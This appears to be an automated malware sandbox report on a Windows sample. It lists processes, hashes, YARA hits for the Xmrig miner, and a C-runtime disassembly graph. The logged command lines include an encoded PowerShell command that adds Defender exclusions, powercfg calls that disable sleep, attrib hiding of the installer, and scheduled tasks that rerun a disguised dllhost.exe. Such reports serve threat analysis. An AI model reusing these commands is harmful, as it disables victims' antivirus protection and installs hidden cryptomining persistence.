                                                                                                                                                                                Imagebase:0xf90000
                                                                                                                                                                                File size:468'992 bytes
                                                                                                                                                                                MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:25
                                                                                                                                                                                Start time:03:18:33
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:attrib +H "Installer.exe"
                                                                                                                                                                                Imagebase:0x7ff624040000
                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:26
                                                                                                                                                                                Start time:03:18:33
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"Installer.exe"
                                                                                                                                                                                Imagebase:0x4e0000
                                                                                                                                                                                File size:625'464 bytes
                                                                                                                                                                                MD5 hash:89A069871324D35E25922F6FB881D514
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000001A.00000002.1666398916.000000000063A000.00000004.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:28
                                                                                                                                                                                Start time:03:18:35
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                Imagebase:0xc70000
                                                                                                                                                                                File size:45'984 bytes
                                                                                                                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.1722768807.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:29
                                                                                                                                                                                Start time:03:18:35
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                                                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:30
                                                                                                                                                                                Start time:03:18:35
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:31
                                                                                                                                                                                Start time:03:18:35
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA=="
                                                                                                                                                                                Imagebase:0xb30000
                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:32
                                                                                                                                                                                Start time:03:18:37
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                Imagebase:0x7ff72d8c0000
                                                                                                                                                                                File size:496'640 bytes
                                                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:33
                                                                                                                                                                                Start time:03:18:39
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:34
                                                                                                                                                                                Start time:03:18:39
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                Imagebase:0xc50000
                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:35
                                                                                                                                                                                Start time:03:18:39
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:36
                                                                                                                                                                                Start time:03:18:39
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:37
                                                                                                                                                                                Start time:03:18:39
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                Imagebase:0xab0000
                                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:38
                                                                                                                                                                                Start time:03:18:39
                                                                                                                                                                                Start date:10/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                                                                                                                                                                Imagebase:0xab0000
                                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:3.3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                  Signature Coverage:5.6%
                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                  Total number of Limit Nodes:65
                                                                                                                                                                                  execution_graph 21277 10aa10 21278 10aa48 21277->21278 21279 10aa19 21277->21279 21279->21278 21282 112a63 21279->21282 21281 10aa3b 21283 112a75 21282->21283 21286 112a7e ___scrt_uninitialize_crt 21282->21286 21284 112be1 ___scrt_uninitialize_crt 68 API calls 21283->21284 21285 112a7b 21284->21285 21285->21281 21287 112a8d 21286->21287 21290 112d66 21286->21290 21287->21281 21291 112d72 ___scrt_is_nonwritable_in_current_image 21290->21291 21298 10f4f5 EnterCriticalSection 21291->21298 21293 112d80 21294 112abf ___scrt_uninitialize_crt 68 API calls 21293->21294 21295 112d91 21294->21295 21299 112dba 21295->21299 21298->21293 21302 10f509 LeaveCriticalSection 21299->21302 21301 112ab4 21301->21281 21302->21301 21303 10a410 21304 10a423 21303->21304 21306 10a437 21304->21306 21307 114627 21304->21307 21308 114633 ___scrt_is_nonwritable_in_current_image 21307->21308 21309 11463a 21308->21309 21310 11464f 21308->21310 21311 111b24 __dosmaperr 14 API calls 21309->21311 21320 10f4f5 EnterCriticalSection 21310->21320 21314 11463f 21311->21314 21313 114659 21321 11469a 21313->21321 21316 112249 ___std_exception_copy 29 API calls 21314->21316 21318 11464a 21316->21318 21318->21306 21320->21313 21322 1146b2 21321->21322 21330 114722 21321->21330 21323 119960 _Fputc 29 API calls 21322->21323 21325 1146b8 21323->21325 21324 1209c0 __fread_nolock 14 API calls 21328 114667 21324->21328 21326 11470a 21325->21326 21325->21330 21327 111b24 __dosmaperr 14 API calls 21326->21327 21329 11470f 21327->21329 21332 114692 21328->21332 21331 112249 ___std_exception_copy 29 API calls 21329->21331 21330->21324 21330->21328 21331->21328 21335 10f509 LeaveCriticalSection 21332->21335 21334 114698 21334->21318 21335->21334 19545 10c002 19546 10c00e ___scrt_is_nonwritable_in_current_image 19545->19546 19571 109511 19546->19571 19548 10c015 19549 10c16e 19548->19549 19559 10c03f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 19548->19559 19608 10b642 IsProcessorFeaturePresent 19549->19608 19551 10c175 19612 10f986 19551->19612 19556 10c05e 19557 10c0df 19582 111f36 19557->19582 19559->19556 19559->19557 19590 10f9d0 19559->19590 19561 10c0e5 19586 6d540 19561->19586 19563 10c0fc 19597 10b5ef GetModuleHandleW 19563->19597 19566 10c10a 19567 10c113 19566->19567 19599 10f9b2 19566->19599 19602 10954a 19567->19602 19572 10951a 19571->19572 19618 10b7b6 IsProcessorFeaturePresent 19572->19618 19576 10952b 19577 10952f 19576->19577 19628 10f410 19576->19628 19577->19548 19580 109546 19580->19548 19583 111f44 19582->19583 19584 111f3f 19582->19584 19583->19561 19700 11205f 19584->19700 19587 6d555 19586->19587 20355 e4a10 19587->20355 19589 6d573 19589->19563 19591 10f9e6 std::_Lockit::_Lockit 19590->19591 19592 1145eb ___scrt_is_nonwritable_in_current_image 19590->19592 19591->19557 19593 11719a __Getctype 39 API calls 19592->19593 19596 1145fc 19593->19596 19594 1128bf CallUnexpected 39 API calls 19595 114626 19594->19595 19596->19594 19598 10b5fb 19597->19598 19598->19551 19598->19566 20387 10fad1 19599->20387 19603 109556 19602->19603 19607 10956c 19603->19607 20458 10f422 19603->20458 19605 109564 19606 10c9de ___scrt_uninitialize_crt 7 API calls 19605->19606 19606->19607 19607->19556 19609 10b658 __fread_nolock CallUnexpected 19608->19609 19610 10b703 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19609->19610 19611 10b74e CallUnexpected 19610->19611 19611->19551 19613 10fad1 CallUnexpected 21 API calls 19612->19613 19614 10c17b 19613->19614 19615 10f99c 19614->19615 19616 10fad1 CallUnexpected 21 API calls 19615->19616 19617 10c183 19616->19617 19619 109526 19618->19619 19620 10c9bf 19619->19620 19637 1158a6 19620->19637 19624 10c9d0 19625 10c9db 19624->19625 19651 1158e2 19624->19651 19625->19576 19627 10c9c8 19627->19576 19691 119279 19628->19691 19631 10c9de 19632 10c9f1 19631->19632 19633 10c9e7 19631->19633 19632->19577 19634 114971 ___vcrt_uninitialize_ptd 6 API calls 19633->19634 19635 10c9ec 19634->19635 19636 1158e2 ___vcrt_uninitialize_locks DeleteCriticalSection 19635->19636 19636->19632 19638 1158af 19637->19638 19640 1158d8 19638->19640 19641 10c9c4 19638->19641 19655 120b0b 19638->19655 19642 1158e2 ___vcrt_uninitialize_locks DeleteCriticalSection 19640->19642 19641->19627 19643 11493e 19641->19643 19642->19641 19672 120a1c 19643->19672 19648 11496e 19648->19624 19650 114953 19650->19624 19652 11590c 19651->19652 19653 1158ed 19651->19653 19652->19627 19654 1158f7 DeleteCriticalSection 19653->19654 19654->19652 19654->19654 19660 120b9d 19655->19660 19658 120b43 InitializeCriticalSectionAndSpinCount 19659 120b2e 19658->19659 19659->19638 19661 120b25 19660->19661 19664 120bbe 19660->19664 19661->19658 19661->19659 19662 120c26 GetProcAddress 19662->19661 19664->19661 19664->19662 19665 120c17 19664->19665 19667 120b52 LoadLibraryExW 19664->19667 19665->19662 19666 120c1f FreeLibrary 19665->19666 19666->19662 19668 120b99 19667->19668 19669 120b69 GetLastError 19667->19669 19668->19664 19669->19668 19670 120b74 ___vcrt_InitializeCriticalSectionEx 19669->19670 19670->19668 19671 120b8a LoadLibraryExW 19670->19671 19671->19664 19673 120b9d ___vcrt_InitializeCriticalSectionEx 5 API calls 19672->19673 19674 120a36 19673->19674 19675 120a4f TlsAlloc 19674->19675 19676 114948 19674->19676 19676->19650 19677 120acd 19676->19677 19678 120b9d ___vcrt_InitializeCriticalSectionEx 5 API calls 19677->19678 19679 120ae7 19678->19679 19680 120b02 TlsSetValue 19679->19680 19681 114961 19679->19681 19680->19681 19681->19648 19682 114971 19681->19682 19683 114981 19682->19683 19684 11497b 19682->19684 19683->19650 19686 120a57 19684->19686 19687 120b9d ___vcrt_InitializeCriticalSectionEx 5 API calls 19686->19687 19688 120a71 19687->19688 19689 120a89 TlsFree 19688->19689 19690 120a7d 19688->19690 19689->19690 19690->19683 19692 119289 19691->19692 19693 109538 19691->19693 19692->19693 19695 1189e2 19692->19695 19693->19580 19693->19631 19696 1189e9 19695->19696 19697 118a2c GetStdHandle 19696->19697 19698 118a8e 19696->19698 19699 118a3f GetFileType 19696->19699 19697->19696 19698->19692 19699->19696 19701 112068 19700->19701 19704 11207e 19700->19704 19701->19704 19706 111fa0 19701->19706 19703 112075 19703->19704 19723 11216d 19703->19723 19704->19583 19707 111fa9 19706->19707 19708 111fac 19706->19708 19707->19703 19732 118ab0 19708->19732 19713 111fc9 19759 11208b 19713->19759 19714 111fbd 19715 116eff ___free_lconv_mon 14 API calls 19714->19715 19717 111fc3 19715->19717 19717->19703 19719 116eff ___free_lconv_mon 14 API calls 19720 111fed 19719->19720 19721 116eff ___free_lconv_mon 14 API calls 19720->19721 19722 111ff3 19721->19722 19722->19703 19724 1121de 19723->19724 19725 11217c 19723->19725 19724->19704 19725->19724 19726 118244 __dosmaperr 14 API calls 19725->19726 19727 1121e2 19725->19727 19728 117049 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 19725->19728 19731 116eff ___free_lconv_mon 14 API calls 19725->19731 20082 11cd8f 19725->20082 19726->19725 19729 116eff ___free_lconv_mon 14 API calls 19727->19729 19728->19725 19729->19724 19731->19725 19733 111fb2 19732->19733 19734 118ab9 19732->19734 19738 11ccb8 GetEnvironmentStringsW 19733->19738 19781 117255 19734->19781 19739 11ccd0 19738->19739 19752 111fb7 19738->19752 19740 117049 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19739->19740 19741 11cced 19740->19741 19742 11cd02 19741->19742 19743 11ccf7 FreeEnvironmentStringsW 19741->19743 19744 116f39 __fread_nolock 15 API calls 19742->19744 19743->19752 19745 11cd09 19744->19745 19746 11cd11 19745->19746 19747 11cd22 19745->19747 19749 116eff ___free_lconv_mon 14 API calls 19746->19749 19748 117049 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19747->19748 19750 11cd32 19748->19750 19751 11cd16 FreeEnvironmentStringsW 19749->19751 19753 11cd41 19750->19753 19754 11cd39 19750->19754 19751->19752 19752->19713 19752->19714 19756 116eff ___free_lconv_mon 14 API calls 19753->19756 19755 116eff ___free_lconv_mon 14 API calls 19754->19755 19757 11cd3f FreeEnvironmentStringsW 19755->19757 19756->19757 19757->19752 19760 1120a0 19759->19760 19761 118244 __dosmaperr 14 API calls 19760->19761 19762 1120c7 19761->19762 19763 1120cf 19762->19763 19775 1120d9 19762->19775 19764 116eff ___free_lconv_mon 14 API calls 19763->19764 19765 111fd0 19764->19765 19765->19719 19766 112136 19767 116eff ___free_lconv_mon 14 API calls 19766->19767 19767->19765 19768 118244 __dosmaperr 14 API calls 19768->19775 19769 112145 20076 112030 19769->20076 19773 116eff ___free_lconv_mon 14 API calls 19776 112152 19773->19776 19774 112160 19778 112276 __Getctype 11 API calls 19774->19778 19775->19766 19775->19768 19775->19769 19775->19774 19777 116eff ___free_lconv_mon 14 API calls 19775->19777 20067 11584c 19775->20067 19779 116eff ___free_lconv_mon 14 API calls 19776->19779 19777->19775 19780 11216c 19778->19780 19779->19765 19782 117260 19781->19782 19783 117266 19781->19783 19784 117bc4 __dosmaperr 6 API calls 19782->19784 19785 117c03 __dosmaperr 6 API calls 19783->19785 19803 11726c 19783->19803 19784->19783 19786 117280 19785->19786 19789 118244 __dosmaperr 14 API calls 19786->19789 19786->19803 19788 117271 19806 118e71 19788->19806 19791 117290 19789->19791 19792 117298 19791->19792 19793 1172ad 19791->19793 19794 117c03 __dosmaperr 6 API calls 19792->19794 19795 117c03 __dosmaperr 6 API calls 19793->19795 19796 1172a4 19794->19796 19797 1172b9 19795->19797 19800 116eff ___free_lconv_mon 14 API calls 19796->19800 19798 1172bd 19797->19798 19799 1172cc 19797->19799 19801 117c03 __dosmaperr 6 API calls 19798->19801 19802 1174ac __dosmaperr 14 API calls 19799->19802 19800->19803 19801->19796 19804 1172d7 19802->19804 19803->19788 19828 1128bf 19803->19828 19805 116eff ___free_lconv_mon 14 API calls 19804->19805 19805->19788 19807 118e9b 19806->19807 19914 118cfd 19807->19914 19810 116f39 __fread_nolock 15 API calls 19811 118ec5 19810->19811 19812 118edb 19811->19812 19813 118ecd 19811->19813 19921 118af8 19812->19921 19814 116eff ___free_lconv_mon 14 API calls 19813->19814 19816 118eb4 19814->19816 19816->19733 19818 118f13 19819 111b24 __dosmaperr 14 API calls 19818->19819 19821 118f18 19819->19821 19820 118f5a 19823 118fa3 19820->19823 19932 11922c 19820->19932 19824 116eff ___free_lconv_mon 14 API calls 19821->19824 19822 118f2e 19822->19820 19825 116eff ___free_lconv_mon 14 API calls 19822->19825 19827 116eff ___free_lconv_mon 14 API calls 19823->19827 19824->19816 19825->19820 19827->19816 19839 119330 19828->19839 19832 1128d9 IsProcessorFeaturePresent 19836 1128e5 19832->19836 19833 1128f8 19834 10f99c CallUnexpected 21 API calls 19833->19834 19837 112902 19834->19837 19835 1128cf 19835->19832 19835->19833 19838 1122aa CallUnexpected 8 API calls 19836->19838 19838->19833 19869 1195b3 19839->19869 19842 119357 19846 119363 ___scrt_is_nonwritable_in_current_image 19842->19846 19843 1193c5 CallUnexpected 19850 1193fb CallUnexpected 19843->19850 19880 112551 EnterCriticalSection 19843->19880 19844 1172eb __dosmaperr 14 API calls 19851 119394 CallUnexpected 19844->19851 19845 1193b3 19847 111b24 __dosmaperr 14 API calls 19845->19847 19846->19843 19846->19844 19846->19845 19846->19851 19848 1193b8 19847->19848 19852 112249 ___std_exception_copy 29 API calls 19848->19852 19849 11939d 19849->19835 19855 119535 19850->19855 19856 119438 19850->19856 19866 119466 19850->19866 19851->19843 19851->19845 19851->19849 19852->19849 19858 119540 19855->19858 19912 112568 LeaveCriticalSection 19855->19912 19856->19866 19881 11719a GetLastError 19856->19881 19860 10f99c CallUnexpected 21 API calls 19858->19860 19861 119548 19860->19861 19863 11719a __Getctype 39 API calls 19867 1194bb 19863->19867 19865 11719a __Getctype 39 API calls 19865->19866 19908 1194e1 19866->19908 19867->19849 19868 11719a __Getctype 39 API calls 19867->19868 19868->19849 19870 1195bf ___scrt_is_nonwritable_in_current_image 19869->19870 19875 112551 EnterCriticalSection 19870->19875 19872 1195cd 19876 11960f 19872->19876 19875->19872 19879 112568 LeaveCriticalSection 19876->19879 19878 1128c4 19878->19835 19878->19842 19879->19878 19880->19850 19882 1171b0 19881->19882 19883 1171b6 19881->19883 19884 117bc4 __dosmaperr 6 API calls 19882->19884 19885 117c03 __dosmaperr 6 API calls 19883->19885 19887 1171ba SetLastError 19883->19887 19884->19883 19886 1171d2 19885->19886 19886->19887 19889 118244 __dosmaperr 14 API calls 19886->19889 19890 11724a 19887->19890 19891 11724f 19887->19891 19892 1171e7 19889->19892 19890->19865 19895 1128bf CallUnexpected 37 API calls 19891->19895 19893 117200 19892->19893 19894 1171ef 19892->19894 19897 117c03 __dosmaperr 6 API calls 19893->19897 19896 117c03 __dosmaperr 6 API calls 19894->19896 19898 117254 19895->19898 19899 1171fd 19896->19899 19900 11720c 19897->19900 19904 116eff ___free_lconv_mon 14 API calls 19899->19904 19901 117210 19900->19901 19902 117227 19900->19902 19903 117c03 __dosmaperr 6 API calls 19901->19903 19905 1174ac __dosmaperr 14 API calls 19902->19905 19903->19899 19904->19887 19906 117232 19905->19906 19907 116eff ___free_lconv_mon 14 API calls 19906->19907 19907->19887 19909 1194ad 19908->19909 19910 1194e5 19908->19910 19909->19849 19909->19863 19909->19867 19913 112568 LeaveCriticalSection 19910->19913 19912->19858 19913->19909 19940 10eb79 19914->19940 19917 118d30 19919 118d47 19917->19919 19920 118d35 GetACP 19917->19920 19918 118d1e GetOEMCP 19918->19919 19919->19810 19919->19816 19920->19919 19922 118cfd 41 API calls 19921->19922 19923 118b18 19922->19923 19925 118b55 IsValidCodePage 19923->19925 19930 118c1d 19923->19930 19931 118b70 __fread_nolock 19923->19931 19924 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 19926 118cfb 19924->19926 19927 118b67 19925->19927 19925->19930 19926->19818 19926->19822 19928 118b90 GetCPInfo 19927->19928 19927->19931 19928->19930 19928->19931 19930->19924 19980 119087 19931->19980 19933 119238 ___scrt_is_nonwritable_in_current_image 19932->19933 20055 112551 EnterCriticalSection 19933->20055 19935 119242 20056 118fc6 19935->20056 19941 10eb90 19940->19941 19942 10eb97 19940->19942 19941->19917 19941->19918 19942->19941 19943 11719a __Getctype 39 API calls 19942->19943 19944 10ebb8 19943->19944 19948 11777e 19944->19948 19949 117791 19948->19949 19951 10ebce 19948->19951 19949->19951 19956 11aab5 19949->19956 19952 1177ab 19951->19952 19953 1177d3 19952->19953 19954 1177be 19952->19954 19953->19941 19954->19953 19977 118a92 19954->19977 19957 11aac1 ___scrt_is_nonwritable_in_current_image 19956->19957 19958 11719a __Getctype 39 API calls 19957->19958 19959 11aaca 19958->19959 19960 11ab10 19959->19960 19969 112551 EnterCriticalSection 19959->19969 19960->19951 19962 11aae8 19970 11ab36 19962->19970 19967 1128bf CallUnexpected 39 API calls 19968 11ab35 19967->19968 19969->19962 19971 11aaf9 19970->19971 19972 11ab44 __Getctype 19970->19972 19974 11ab15 19971->19974 19972->19971 19973 11a8ea __Getctype 14 API calls 19972->19973 19973->19971 19975 112568 std::_Lockit::~_Lockit LeaveCriticalSection 19974->19975 19976 11ab0c 19975->19976 19976->19960 19976->19967 19978 11719a __Getctype 39 API calls 19977->19978 19979 118a97 19978->19979 19979->19953 19981 1190af GetCPInfo 19980->19981 19990 119178 19980->19990 19986 1190c7 19981->19986 19981->19990 19983 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 19984 11922a 19983->19984 19984->19930 19991 118530 19986->19991 19990->19983 19992 10eb79 __strnicoll 39 API calls 19991->19992 19993 118550 19992->19993 19994 116f87 __strnicoll MultiByteToWideChar 19993->19994 19998 11857d 19994->19998 19995 11860c 19997 1091e8 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 19995->19997 19996 118604 20011 10bcc3 19996->20011 20000 11862f 19997->20000 19998->19995 19998->19996 19999 116f39 __fread_nolock 15 API calls 19998->19999 20002 1185a2 __fread_nolock __alloca_probe_16 19998->20002 19999->20002 20006 118631 20000->20006 20002->19996 20003 116f87 __strnicoll MultiByteToWideChar 20002->20003 20004 1185eb 20003->20004 20004->19996 20005 1185f2 GetStringTypeW 20004->20005 20005->19996 20012 10bccd 20011->20012 20013 10bcde 20011->20013 20012->20013 20013->19995 20055->19935 20057 1131d9 __fread_nolock 29 API calls 20056->20057 20058 118fe8 20057->20058 20068 115868 20067->20068 20069 11585a 20067->20069 20070 111b24 __dosmaperr 14 API calls 20068->20070 20069->20068 20071 115880 20069->20071 20075 115870 20070->20075 20073 11587a 20071->20073 20074 111b24 __dosmaperr 14 API calls 20071->20074 20072 112249 ___std_exception_copy 29 API calls 20072->20073 20073->19775 20074->20075 20075->20072 20077 11203d 20076->20077 20078 11205a 20076->20078 20079 112054 20077->20079 20080 116eff ___free_lconv_mon 14 API calls 20077->20080 20078->19773 20081 116eff ___free_lconv_mon 14 API calls 20079->20081 20080->20077 20081->20078 20083 11cd9a 20082->20083 20084 11cdab 20083->20084 20088 11cdbe ___from_strstr_to_strchr 20083->20088 20085 111b24 __dosmaperr 14 API calls 20084->20085 20086 11cdb0 20085->20086 20086->19725 20087 11cfd5 20090 111b24 __dosmaperr 14 API calls 20087->20090 20088->20087 20089 11cdde 20088->20089 20145 11cffa 20089->20145 20092 11cfda 20090->20092 20094 116eff ___free_lconv_mon 14 API calls 20092->20094 20094->20086 